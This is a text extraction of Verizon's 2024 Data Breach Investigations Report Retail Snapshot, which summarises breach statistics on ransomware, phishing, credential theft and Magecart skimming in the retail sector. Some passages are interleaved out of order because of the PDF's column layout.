2024 Data Breach

Investigations Report
Manufacturing
Retail SnapshotSnapshot
 Phishing

Exploit
vulnerabilities

Credentials

Desktop sharing Email VPN Web applications

About the cover
This year, the report is delving deeper
into the pathway to breaches in an effort
to identify the most likely Action and
vector groupings that lead to breaches
given the current threat landscape. The
cracked doorway on the cover is meant
to represent the various ways attackers
can make their way inside. The opening
in the door shows the pattern of our
combined “ways-in” percentages (see
Figure 7 of the full report for a more
straightforward representation), and
it lets out a band of light displaying a
pattern of the Action vector quantities.
The inner cover highlights and labels
the quantities in a less abstract way.
Hope you enjoy our art house phase.
Table of
contents

Welcome 5

Summary of findings 6

Incident Classification Patterns 9

Insights for Retail 12

2024 Data Breach Investigations Report Retail Snapshot 4

Welcome
Hello, and welcome to the Verizon Data Breach Investigations
Report (DBIR) Retail Snapshot.

The DBIR aims to provide security About the 2024 DBIR The standard uses two- to six-digit
professionals with an in-depth analysis codes to classify businesses and
of data-driven, real-world instances of
incident dataset organizations. Our analysis is typically
cybercrime and how cyberattacks play Each year, the DBIR timeline for in- done at the two-digit level, and we
out across organizations of different scope incidents is from November 1 will specify NAICS codes along with
sizes as well as from different verticals of one calendar year through October an industry label. For example, a
and disparate geographic locations. 31 of the next calendar year. Thus, chart with a label of Retail (NAICS
We hope that by doing so, we can the incidents described in this year’s 44–45) is not indicative of 44–45
provide you with insight into what report took place between November as a value. “44–45” is the code for
particular threats your organization is 1, 2022, and October 31, 2023. The the Retail Trade sector. Detailed
most likely to face and thereby help 2023 caseload is the primary analytical information on the codes and the
prepare you to handle them in the best focus of the 2024 report, but the classification system is available here:
possible manner. entire range of data is referenced
throughout, notably in trending graphs. https://www.census.gov/
As in past years, we will examine what The time between the latter date and naics/?58967?yearbck=2012
our data has to tell us about threat the date of publication for the report
actors and the tools they employ is spent in acquiring the data from
against enterprises. This year, we our global contributors, anonymizing
analyzed 30,458 real-world security and aggregating that data, analyzing

30,458
incidents, of which 10,626 were the dataset, and finally creating the
confirmed data breaches (a record graphics and writing the report.
high!), with victims spanning
94 countries.
Industry labels security incidents
This data represents actual, real-world investigated
breaches and incidents investigated by This snapshot highlights important
the Verizon Threat Research Advisory takeaways for the Retail Trade
Center (VTRAC) or provided to us by (NAICS 44–45) sector, which includes
one of our global contributors without establishments primarily engaged in
retailing merchandise generally without

10,626
whose generous help this document
could not be produced. We hope you transformation and rendering services
can use this report and the information incidental to the sale of merchandise.
it contains to increase your awareness
In the DBIR, we align with the North confirmed breaches
of the most common tactics used
American Industry Classification
against organizations at large and your
System (NAICS) standard to categorize
specific industry. It offers strategies
the victim organizations in our corpus.
to help protect your company and its
assets. Read the full report for a more
detailed view of the threats you may
face today at verizon.com/dbir.

2024 Data Breach Investigations Report Retail Snapshot 5

Summary of
findings
They’re exploiting
our vulnerabilities.
Our ways-in analysis witnessed a
substantial growth of attacks involving
the exploitation of vulnerabilities as
the critical path to initiate a breach
when compared to previous years—
almost tripling (180% increase) from
last year. This was largely due to the
effect of MOVEit and similar zero-day
vulnerabilities, primarily leveraged by
ransomware and other extortion-related
threat actors using Web applications as
their initial entry points.

Figure e06e6468. Select ways-in enumerations in non-Error, non-Misuse breaches

Figure 1. Select ways-in enumerations in non-Error, non-Misuse breaches (n=6,963)
(n=6,963)

Ransomware and Extortion

are significant threats.
Roughly one-third of all breaches
involved Ransomware or some other
Extortion technique. Pure Extortion
attacks have risen over the past year
and are now a component of 9% of all
breaches. Ransomware actors have
moved toward these newer techniques,
Figure 406b8170. Ransomware and Extortion breaches over time resulting in a bit of a decline in
Figure 2. Ransomware and Extortion breaches over time Ransomware to 23%. However,
when combined, they represent a
strong growth to 32% of breaches.
Additionally, Ransomware was a top
threat across 92% of industries.

2024 Data Breach Investigations Report Retail Snapshot 6

 We’ve identified the
most common ways in.
We have revised our calculation of
the human element in breaches to
exclude malicious Privilege Misuse
to provide a clearer metric of what
security awareness can impact. For
this year’s dataset, the human element
was a component of 68% of breaches,
roughly the same as the previous
period described in the 2023 DBIR.

In this issue, we are introducing

an expanded concept of a breach
involving a third party to include partner
infrastructure being affected and
direct or indirect software supply chain
issues—including when an organization
is affected by vulnerabilities in third-
party software. In short, these are
the breaches an organization could
potentially mitigate or prevent by trying
to select vendors with better security
track records. We see this figure at
15% this year, a 68% increase from the
previous year, mostly fueled by the use
of zero-day exploits for Ransomware
and Extortion attacks.

Our dataset saw a growth of breaches

involving Errors, now at 28%, as we
broadened our contributor base to
include several new mandatory breach
notification entities. This validates
our suspicion that errors are more
prevalent than media or traditional
incident response–driven bias would
have us believe.
Figure c6bb8d59. Select key enumerations in breaches
Figure 3. Select key enumerations in breaches

2024 Data Breach Investigations Report Retail Snapshot 7

 Falling for Phishing
happens fast.
The overall reporting rate of Phishing
has been growing over the past few
years. In security awareness exercise
data contributed by our partners during
2023, 20% of users reported phishing
in simulation engagements, and 11%
of the users who clicked the email
also reported. This is welcome news
because the median time to click on a
malicious link after the email is opened
is 21 seconds and then only another
28 seconds for the person caught in
the phishing scheme to enter their
Figure 4c70a87f. Phishing email report rate by click status
Figure 4. Phishing email report rate by click status data. This leads to an alarming finding:
The median time for users to fall for
phishing emails is less than
60 seconds.

They go where the money is.

Financially motivated threat actors
will typically stick to the attack
techniques that give them the most
return on investment.

Over the past three years, the

combination of Ransomware and other
Extortion breaches have accounted for
almost two-thirds (fluctuating between
59% and 66%) of those attacks.
According to the FBI’s Internet Crime
Complaint Center (IC3) ransomware
complaint data, the median loss
associated with the combination of
Ransomware and other Extortion
Figure 1ee8b0a9. Select action varieties in Financial motive over time
Figure 5. Select action varieties in Financial motive over time breaches has been $46,000, ranging
between $3 (three dollars) and
$1,141,467 for 95% of cases. We also
found from ransomware negotiation
data contributors that the median
ratio of initially requested ransom
and company revenue is 1.34%, but it
fluctuated between 0.13% and 8.3% for
80% of the cases.

Similarly, over the past two years, we

have seen incidents involving Pretexting
(the majority of which had Business
Email Compromise [BEC] as the
outcome) accounting for one-fourth
(ranging between 24% and 25%) of
financially motivated attacks. In both
years, the median transaction amount
of a BEC was around $50,000.

2024 Data Breach Investigations Report Retail Snapshot 8

Incident
Classification
Patterns
The DBIR first introduced the Incident Classification Patterns in 2014 as a useful
shorthand for scenarios that occurred very frequently. In 2022, due to changes in
attack type and the threat landscape, we revamped and enhanced those patterns,
moving from nine to eight—the seven you see in this report and the Everything Else
“pattern,” which is a catch-all for incidents that don’t fit within the orderly confines
of the other patterns.

These patterns are based on an elegant machine-learning clustering process,

equipped to better capture complex interaction rules, and they are much more
focused on what happens during the breach. That makes them better suited for
control recommendations, too.

Here are our key findings for each pattern:

System Intrusion Ransomware attacks continue to drive the growth of this pattern as they now
account for 23% of all breaches and 70% of the incidents within System Intrusion.
These are complex attacks
that leverage malware and/or • Ransomware (or some type of Extortion) appears in 92% of industries as one of
hacking to achieve their objectives,
the top threats.
including deploying ransomware.
• Analyzing the FBI Internet Crime Complaint Center dataset this year, we found
that the median adjusted loss (after law enforcement worked to try to recover
funds) for those who did pay was around $46,000.
• Traditional Ransomware’s prevalence declined slightly to 23%. However, roughly
one-third (32%) of all breaches involved some type of Extortion technique,
including Ransomware. The meteoric growth of Extortion attacks made this
combined threat stand out in our dataset.

Social Engineering More than 40% of incidents involved Pretexting, and 31% involved Phishing. Other
tried-and-true tactics include attacks coming in via email, text and websites.
This attack involves the psychological
compromise of a person that alters • Phishing and Pretexting via email continue to be the leading cause of incidents in
their behavior into taking an action or this sector, accounting for 73% of breaches.
breaching confidentiality.
• The median time for users to fall for phishing emails is less than 60 seconds.
• More than 20% of users identified and reported phishing per engagement,
including 11% of the users who did click the email.
• Over the past two years, roughly one-fourth (between 24% and 25%) of financially
motivated incidents involved Pretexting, the majority of which resulted in a
Business Email Compromise (BEC). In both years, the median transaction amount
of a BEC was around $50,000.1

1. According to the FBI’s Internet Crime Complaint Center ransomware complaint data

2024 Data Breach Investigations Report Retail Snapshot 9

Basic Web Application Attacks Financially motivated external actors continue to target credentials and
personal information.
These attacks are against a web
application, and after the initial • Over the past 10 years, stolen credentials have appeared in almost one-third
compromise, they do not have a (31%) of breaches.
large number of additional Actions.
It is the “get in, get the data and • Our dataset shows just over 8% of breaches in the Basic Web Application
get out” pattern. Attacks pattern.
• After examining postings from marketplaces dedicated to selling and reselling
credentials and cookies collected from password stealers, we found that 65% of
these credentials were posted for sale on criminal forums less than one day from
when they were collected.
• There is no substantial difference between large organizations (55%) and small
organizations (47%) in the Basic Web Application Attacks pattern.

Miscellaneous Errors More than 50% of errors were the result of Misdelivery, continuing last year’s trend,
while other errors, such as Disposal, are declining.
Incidents where unintentional actions
directly compromised a security • Misconfiguration is the next most common error and was seen in approximately
attribute of an information asset fall 10% of breaches.
into this pattern. This does not include
lost devices, which are grouped with • Classification errors, Publishing errors and Gaffes (verbal slips) are all relatively
theft instead. tightly packed in order of mention. Disposal errors continue to decline ever so
slightly (as has been the general trend for the last several years) and accounted
for just over 1% of the cases in this pattern.
• End-users now account for 87% of errors, emphasizing the need for universal
error-catching controls across industries.

Denial of Service Denial of Service is responsible for more than 50% of incidents analyzed this year.
These attacks are intended to
• Our ongoing analysis of content delivery network (CDN)-monitored, web
compromise the availability of networks
application-focused Denial of Service attacks shows that even though the median
and systems. This includes both
attack size has reduced slightly from 2.2 gigabits per second (Gbps) to 1.6 Gbps,
network and application layer attacks.
the 97.5th percentile of those attacks increased to 170 Gbps from the previous
high of 124 Gbps.
• Subject matter experts (SMEs) continue to report the growth of low-
volume, persistent attacks on high-interaction services such as Domain
Name System (DNS).

2024 Data Breach Investigations Report Retail Snapshot 10

Lost and Stolen Assets Devices are still much more likely to be lost than stolen. Laptops continue to be a
risk for loss in particular.
Incidents where an information
asset went missing, whether through • This year we saw a higher percentage of incidents involving Assets in this pattern
misplacement or malice, are grouped causing confirmed data breaches, with last year showing about 8% confirmed
into this pattern. breaches and this year showing a surprising 91%.

Privilege Misuse In our prior report, we saw collusion—multiple actors working in concert to achieve
the goal of the breach—at 7%, which, while nowhere near the highs we saw back in
These incidents are predominantly
2019, was still a surprise. This year, things seem to have gone back to normal, and
driven by unapproved or malicious
we are seeing collusion dropping to less than 1% of breaches.
use of legitimate privileges.
• Employees are largely taking Personal data—this is likely about taking
customers’ information.
• Internal actors are again largely working on their own in this pattern. The Financial
motivation remains in ascension, while Espionage is a distant second. Personal
data is still the main targeted data type.
• We saw Internal data show a bit of a spike this year as well, which would include
sensitive plans and intellectual property that would attract the Espionage-
motivated employee.
• Finally, Banking data is remaining mostly steady over time as a targeted data type.

Table 1. Incident Classification Patterns key findings

2024 Data Breach Investigations Report Retail Snapshot 11

Retail

44–45
NAICS
Frequency 725 incidents, The Retail sector is where we often useful Credentials are to your average
369 with confirmed find “Magecart” threat actors. They are threat actor, but we were stunned to
data disclosure particularly skilled at inserting malicious see Payment card data, so useful for
code into the e-commerce sites of immediate fraud, drop so precipitously
Top patterns System Intrusion, retail entities to siphon off (usually) (Figure 7). As we have indicated
Social Engineering Payment card information. We saw before, we get the “what” of the
and Basic Web roughly the same percentage of these changes in the data, but we do not
Application Attacks kinds of attacks this year as we did always get the “why.” Is this a result
represent 92% of last year (Figure 6). However, the type of increased controls around the
breaches of data being compromised showed a monetization of payment card data,
surprising change. making it harder for the criminals to
Threat actors External (96%), use the data they have stolen? Or is
Internal (4%) With Credentials standing at 38% it just that credentials are so much
(breaches) (very close to last year’s 35%) we easier to steal? Either way, we will be
didn’t expect to see Payment card interested to see if this is just a blip on
Actor motives Financial (99%), data drop to 25% (from 37%). Now, the radar or an actual trend starting.
Espionage (1%) we understand how attractive and
(breaches)

Data Credentials (38%),

compromised Other (31%),
Payment (25%),
System (20%)
(breaches)
Social Engineering
What is the The three attack
same? patterns not only
remained consistent
but are even in
the same ranked
Basic Web Application Attacks
order as last year.
Threat actors with a
Financial motivation Figure 74. Top patterns over time in Retail industry breaches
continue to target Figure 6. Top patterns over time in Retail industry breaches
this sector.

Summary
While this industry is usually the
place where we see Payment card
data stolen, the focus of the threat
actors has shifted to Credentials.
Pretexting is also increasing, while
Phishing has dropped. Denial of
Service attacks remain a problem
for Retail organizations, causing
disruption to their ability to serve
their customers and make sales.

2024 Data Breach Investigations Report Retail Snapshot 12

 In social-related breaches, Pretexting
has emerged triumphant over Phishing
as the top social action. It is good to
see that the threat actors were required
to step up their game to successfully
influence their chosen targets. Dare we
hope it is because people are becoming
better educated and thus able to resist
the run-of-the-mill phishing efforts? A
suspicious user community is a well-
protected user community.

With regard to incidents, Denial of

Service continues to represent a
serious problem. While these attacks
rarely result in confirmed data breaches,
they do come with potentially serious
disruption of the organization’s ability
to function. We also saw Ransomware-
related incidents continue to decline as
they have since 2021.

Figure 75. Top Confidentiality data

Figure 7.in
varieties Top Confidentiality
Retail data
industry breaches
varieties
(n=341) in Retail industry breaches
(n=341)

2024 Data Breach Investigations Report Retail Snapshot 13

Stay informed
and threat ready.
Facing today’s threats requires intelligence from an authoritative
source of cybersecurity breach information.
The full DBIR contains details on the actors, actions and patterns that
can help you prepare your defenses and educate your organization.
Read the full 2024 DBIR at verizon.com/dbir.

Questions? Comments? Concerns? Love to share

cute pet pictures?
Let us know! Send us a note at dbir@verizon.com, find us on LinkedIn, tweet
@VerizonBusiness with #dbir. Got a data question? Tweet @VZDBIR!

If your organization aggregates incident or security data and is interested in becoming a

contributor to the annual Verizon DBIR (and we hope you are), the process is very easy
and straightforward. Please email us at dbircontributor@verizon.com.

© 2024 Verizon. OGREP4040624

2024 Data Breach Investigations Report Retail Snapshot 14